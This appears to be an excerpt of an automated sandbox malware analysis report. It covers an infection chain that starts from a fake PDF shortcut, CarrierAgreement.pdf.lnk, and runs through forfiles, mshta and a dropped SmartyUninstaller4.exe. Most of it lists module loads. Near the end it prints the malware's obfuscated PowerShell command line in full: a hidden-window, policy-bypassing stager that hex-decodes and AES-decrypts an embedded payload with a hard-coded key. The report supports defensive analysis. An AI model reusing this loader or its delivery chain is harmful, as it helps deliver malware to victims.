Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: imgutil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: CarrierAgreement.pdf.lnk.mal.lnk LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: dialer.pdbGCTL source: mshta.exe, 00000003.00000003.1698099382.000002A348BD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1698162082.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2275633004.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273168560.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276837348.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2271894344.000002A348BFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1698162082.000002A344A19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2281903951.000002A3449DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273384100.0000029B427E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2282608554.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272497103.000002A348BD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272811778.000002A3449D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272010421.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272533202.000002A3449C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272010421.000002A344A19000.00000004.00000020.00020000.00000000.sdmp, carrieragreement[1].3.dr
Source: Binary string: dialer.pdb source: mshta.exe, 00000003.00000003.1698162082.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2275633004.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273168560.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276837348.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2281903951.000002A3449DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273384100.0000029B427E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2282608554.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272811778.000002A3449D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272010421.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272533202.000002A3449C1000.00000004.00000020.00020000.00000000.sdmp, carrieragreement[1].3.dr

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split ($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('E5A55824D9EAF8A8C3514E39CEDEF30B918A2A1589DF287752B8D027F1DFBF83EE12DB088588624EC45E743D432DCA79C93A71346B475008579989A09F5D98E1D33138882FF475A777BFA374EB0BFD6A0B25AA253A05AF641E20F4C77FC5CD0BE786B5EAA1F37060C9B9C4DA610ABA833E1A608F90B5E6B8D0C72A052CE081AB6CEF4890ABA76C1939DBFDD7FC25ACC315BBF81EE00ED5787C37F8EC15BBBDC9534009AE0B1FAA407C742099126C7FD0D4FE48ED239BE661785C96903D2AED48751F6A32EA8FFA5B259E531FDE2EBF959342027F3F21889F4103EF93280E2115E8BCEF81D14F8F1D89FF8A475B2F2B6767EDC2491A188CC66BF8A2D116BBD2EDADACC2568D9E03C1330B480BB24242F43AF308990B03DE2465DE44C087B8FDB79C2730BDA7EF8701F2098485DEDB88534CEB321A754FAF5DFF2DFCE6F9109288BE3A78B858A0BAED175DE2205F8F17399B26D860EF1D36E319889DDF54024D57413E8ED3BEE8124C99DC0646E86AF2E54A5DEBC68B17BE7F7790E239CC2289250802915B60ED57ECB3427EAA9BE75B0D811C4C5B5A1BC67E8A4E562AF8BB426F451AD03756F2DA6C85FD25754E21264E99ADB5CBE785D577DF55A5CFC65B2968F737477CC6D303C6B6AE4ADD6B71C05EF67DE56A89B1959E503669C7B27D1EB3EB0609B8D7F9D259D985807288297EFEF04CF7B98A19BBE5FEBF808E5D0B15E790F44431D0F52E70C27ECA747B9168AACC8B7730C50B98B31A5E95CF43E58AB8DA6BF46550035D830DBF8CE8A450849D09E261020820A3C898AC6BC7CA589994D1A7BC6CBB01495D1CA57D60B1E68AF9D1E53C5BD5310153FC3E2B8DFD9D910AA312BC6C305AA7DE3E6C1D1689D0E1B54ECBA688DB6977B50F8ADB1C843896B619A4C1C88BC05BA171BAF12FB0751D9425C26258CBB29B82CA964FDCFBB779D338C140E4B54AD473109871DA665A1028B5489F2936C002C23995EAAD75FAEC7D1C23658D72E5BCA801DBF50A83D1585FB03487AACBE213CBFBAF54DDF43E0CC1780607030370FD254E6D185EC019BED40DF3A26364E22144A3A2AB186D06DF0AF4FE35CA93D05915D6D6D7D3C7A54F25E18421320862CE1CC9B0C7B510C13A30A01950668FE380F154C133E73AB0E0C92A044F3669BE276DD745D220149675000E09D63EE960879409BFEDEDA3483BC1079257FCEC92518331731EBF09B0068461A60C6FE5450A668155187769B3714F8674259AE2383B26BFC047B3345B4B1A2E81BC4ACC879B282641BEA83118BD16A91C3FB040349F9A220F52F0A904E971C68A8B7AE7F5860034B22033F31CAF74B121D6F0672EDF133C9764CF0B79274ADA57554D5617BDEB924FDD1A69B7BCA18D34E108B89C42EAF960A2FE309D50F3E17C6EC586E0EF4646E2D418053C151C42EA1E041F414D94AAEC7DCA3D6086FEFF2D608A4D5DEA1B781AEA3109FCF4EF60DBA03DCB649FE16896B50AED1F8D5319155B11B14787101FA727118B88D50589B74206D84CD45A5FFF0653B0DC3265B92186DA8EAE07E65D0B6F1F9562421931175ADCDB8346280E92044D6DF6C3D7D6C52C1B0961211A8CD2138E79D9387D320F595E3DFFAC8D1B0D2636413271E4DC4BF7316364061FF4C0A348C05FDFAAE265E971340F850E916C6EDEF9420625A4401A18306FFA9047A91CDEAD91F699FE8D0055E27192A17C38DCBCEA41A83C4E3158F4D0F8634F43AC1CAAE822B7E6');$VTjxj = [System.Security.Cryptography.Aes]::Create();$VTjxj.Key = aaTynIUh('7566656A62656D6D6241736C57716B6A');$VTjxj.IV = New-Object byte[] 16;$paOghKFl = $VTjxj.CreateDecryptor();$EkiGvPGrs = $paOghKFl.TransformFinalBlock($VuCCamL, 0, $VuCCamL.Length);$NvSFUKzSO = [System.Text.Encoding]::Utf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split ($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('E5A55824D9EAF8A8C3514E39CEDEF30B918A2A1589DF287752B8D027F1DFBF83EE12DB088588624EC45E743D432DCA79C93A71346B475008579989A09F5D98E1D33138882FF475A777BFA374EB0BFD6A0B25AA253A05AF641E20F4C77FC5CD0BE786B5EAA1F37060C9B9C4DA610ABA833E1A608F90B5E6B8D0C72A052CE081AB6CEF4890ABA76C1939DBFDD7FC25ACC315BBF81EE00ED5787C37F8EC15BBBDC9534009AE0B1FAA407C742099126C7FD0D4FE48ED239BE661785C96903D2AED48751F6A32EA8FFA5B259E531FDE2EBF959342027F3F21889F4103EF93280E2115E8BCEF81D14F8F1D89FF8A475B2F2B6767EDC2491A188CC66BF8A2D116BBD2EDADACC2568D9E03C1330B480BB24242F43AF308990B03DE2465DE44C087B8FDB79C2730BDA7EF8701F2098485DEDB88534CEB321A754FAF5DFF2DFCE6F9109288BE3A78B858A0BAED175DE2205F8F17399B26D860EF1D36E319889DDF54024D57413E8ED3BEE8124C99DC0646E86AF2E54A5DEBC68B17BE7F7790E239CC2289250802915B60ED57ECB3427EAA9BE75B0D811C4C5B5A1BC67E8A4E562AF8BB426F451AD03756F2DA6C85FD25754E21264E99ADB5CBE785D577DF55A5CFC65B2968F737477CC6D303C6B6AE4ADD6B71C05EF67DE56A89B1959E503669C7B27D1EB3EB0609B8D7F9D259D985807288297EFEF04CF7B98A19BBE5FEBF808E5D0B15E790F44431D0F52E70C27ECA